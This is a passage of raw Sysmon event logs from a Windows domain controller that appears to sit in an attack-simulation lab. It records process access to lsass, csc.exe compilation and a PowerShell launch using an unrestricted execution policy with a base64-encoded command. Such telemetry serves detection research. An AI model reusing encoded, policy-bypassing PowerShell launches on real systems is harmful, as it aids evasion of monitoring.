SYSTEM32\ntdll.dll+51791 10341000x8000000000000000270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.200{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.200{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.200{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.200{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.200{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.200{59A5CD1D-8C95-6005-0500-00000000A201}640764C:\Windows\system32\csrss.exe{59A5CD1D-8E1E-6005-C802-00000000A201}3708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.200{59A5CD1D-8E1D-6005-C602-00000000A201}36764856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E1E-6005-C802-00000000A201}3708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c1edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c19a9|UNKNOWN(00007FFA402DB68F) 154100x8000000000000000263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.207{59A5CD1D-8E1E-6005-C802-00000000A201}3708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\fdypqgxp.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E1D-6005-C64B-100000000000}0x104bc60HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{59A5CD1D-8E1D-6005-C602-00000000A201}3676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 11241100x8000000000000000262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:18.200{59A5CD1D-8E1D-6005-C602-00000000A201}3676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\fdypqgxp.cmdline2021-01-18 13:33:18.200 11241100x8000000000000000261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:33:18.200{59A5CD1D-8E1D-6005-C602-00000000A201}3676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\fdypqgxp.dll2021-01-18 13:33:18.200 10341000x8000000000000000390Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.763{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000389Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.763{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000388Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.747{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000387Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.622{59A5CD1D-8E1F-6005-CB02-00000000A201}41484316C:\Windows\system32\conhost.exe{59A5CD1D-8E1F-6005-CF02-00000000A201}4088C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000386Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.622{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000385Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.622{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000384Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.622{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000383Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.622{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000382Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.622{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000381Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.622{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000380Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.622{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000379Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.622{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000378Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.622{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000377Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.622{59A5CD1D-8C95-6005-0500-00000000A201}640764C:\Windows\system32\csrss.exe{59A5CD1D-8E1F-6005-CF02-00000000A201}4088C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000376Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.622{59A5CD1D-8E1F-6005-CE02-00000000A201}37204528C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E1F-6005-CF02-00000000A201}4088C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95c9331b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+951341a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95133e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95be54db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+950f4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1